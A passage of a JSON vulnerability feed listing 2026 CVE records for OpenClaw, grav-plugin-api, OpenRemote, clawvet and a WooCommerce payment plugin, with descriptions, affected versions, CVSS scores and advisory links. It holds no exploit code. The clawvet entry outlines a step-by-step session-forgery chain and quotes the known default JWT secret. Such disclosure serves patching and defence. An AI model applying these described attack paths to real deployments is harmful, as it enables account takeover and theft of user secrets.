"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:53:26.752804Z","id":"CVE-2026-62221","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fh8v-vgcv-pwh4","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allowfrom","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62224","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:09.603","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw MS Teams before 2026.5.12 contain an authorization bypass vulnerability where the allowFrom feature binds to mutable display names. Attackers with lower-trust access can perform actions requiring stronger authorization by exploiting the mutable display name binding in the affected feature."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"openclaw","product":"msteams","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw/msteams","versions":[{"version":"0","lessThan":"2026.5.12","versionType":"semver","status":"affected"},{"version":"2026.5.12","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.3,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:10:07.749014Z","id":"CVE-2026-62224","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-290"},{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7w4v-g4m6-j88v","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-ms-teams-authorization-bypass","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62225","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:09.750","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.5.18 contain an authorization bypass vulnerability in skill command dispatch that allows lower-trust callers to execute or persist actions beyond their intended authorization. Attackers can bypass tool policy restrictions through configured input paths to perform unauthorized actions when the affected feature is enabled and reachable."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.5.18","versionType":"semver","status":"affected"},{"version":"2026.5.18","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.3,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhm4-93fw-4qr2","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-skill-command-dispatch","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62226","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:09.887","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.3.28 before 2026.5.19 contain an authorization bypass vulnerability in the browser act route that fails to properly validate current-tab URL checks. Attackers with lower-trust access or configured input paths can perform actions requiring stronger authorization or policy checks."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.3.28","lessThan":"2026.5.19","versionType":"semver","status":"affected"},{"version":"2026.5.19","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","baseScore":8.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:53:11.369926Z","id":"CVE-2026-62226","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x863-pqjw-hmgf","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-browser-act-route","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62227","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:10.027","lastModified":"2026-07-17T19:17:18.390","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.4.14 before 2026.5.26 contain a server-side request forgery vulnerability in browser snapshot routes that fail to validate post-navigation destinations. Attackers with lower-trust access can bypass OpenClaw policy checks to reach network destinations that should have been blocked."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.4.14","lessThan":"2026.5.26","versionType":"semver","status":"affected"},{"version":"2026.5.26","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:40:34.090568Z","id":"CVE-2026-62227","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2x93-h3hg-2xfp","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-ssrf-via-browser-snapshot","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62233","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:10.890","lastModified":"2026-07-17T19:17:18.523","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"grav-plugin-api before 1.0.6 fails to validate super-admin status in createApiKey, generate2fa, and disable2fa endpoints, allowing non-super api.users.write managers to escalate to super-admin. Attackers can mint API keys bound to super-admin accounts or strip 2FA from super-admin users to achieve full instance takeover."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"getgrav","product":"grav","defaultStatus":"unaffected","repo":"https://github.com/getgrav/grav","versions":[{"version":"0","lessThan":"1.0.6","versionType":"semver","status":"affected"},{"version":"1.0.6","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:40:11.166785Z","id":"CVE-2026-62233","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"},{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/getgrav/grav/security/advisories/GHSA-8gg4-rvvv-cq96","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/grav-plugin-api-privilege-escalation-via-createapikey","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62238","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:11.613","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenRemote before 1.26.0 contain an authenticated SQL injection vulnerability in the datapoint crosstab export endpoint that constructs PostgreSQL queries by concatenating asset display names into raw SQL. An authenticated attacker with asset creation or rename permissions can inject SQL through the asset name parameter and receive query results in the exported CSV response, enabling database data exfiltration."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"openremote","product":"openremote","defaultStatus":"unaffected","repo":"https://github.com/openremote/openremote","versions":[{"version":"0","lessThan":"1.26.0","versionType":"semver","status":"affected"},{"version":"1.26.0","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:28:06.337245Z","id":"CVE-2026-62238","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/openremote/openremote/security/advisories/GHSA-cgfv-jrfp-2r7v","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openremote-sql-injection-via-crosstab-export","source":"disclosure@vulncheck.com"},{"url":"https://github.com/openremote/openremote/security/advisories/GHSA-cgfv-jrfp-2r7v","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-62241","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:11.740","lastModified":"2026-07-17T19:17:18.647","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"clawvet self-hosted API server (apps/api) before 0.7.5 hard-codes a fallback JWT secret ('clawvet-dev-secret-change-me') in auth.ts and ships it as the default in .env.example. Because GET /api/v1/scans returns scan records containing userId values without authentication, a remote unauthenticated attacker can harvest a victim's userId, forge a valid HS256 cg_session cookie offline using the known secret, and call GET /api/v1/auth/me to obtain the victim's email address, subscription plan, and secret apiKey. The published clawvet npm package (CLI only) is not affected."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"MohibShaikh","product":"clawvet","defaultStatus":"unaffected","repo":"https://github.com/MohibShaikh/clawvet","versions":[{"version":"0","lessThan":"0.7.5","versionType":"semver","status":"affected"},{"version":"0.7.5","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:36:36.672856Z","id":"CVE-2026-62241","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-306"},{"lang":"en","value":"CWE-321"}]}],"references":[{"url":"https://github.com/MohibShaikh/clawvet/security/advisories/GHSA-9mww-p953-jfc9","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/clawvet-hard-coded-jwt-secret-session-forgery","source":"disclosure@vulncheck.com"},{"url":"https://github.com/MohibShaikh/clawvet/security/advisories/GHSA-9mww-p953-jfc9","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-11324","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T04:16:50.177","lastModified":"2026-07-17T19:17:12.170","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The WooCommerce Placetopay Gateway and PlacetoPay/AvalPay gateway plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the 'redirect-url' parameter in versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"evertec","product":"WooCommerce Placetopay Gateway Belice","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]},{"vendor":"evertec","product":"WooCommerce Placetopay Gateway Ecuador","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]},{"vendor":"evertec","product":"WooCommerce Placetopay Gateway Colombia","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]},{"vendor":"evertec","product":"WooCommerce Placetopay Gateway Uruguay","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]},{"vendor":"evertec","product":"WooCommerce Placetopay Gateway","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]},{"vendor":"evertec","product":"WooCommerce Placetopay Gateway 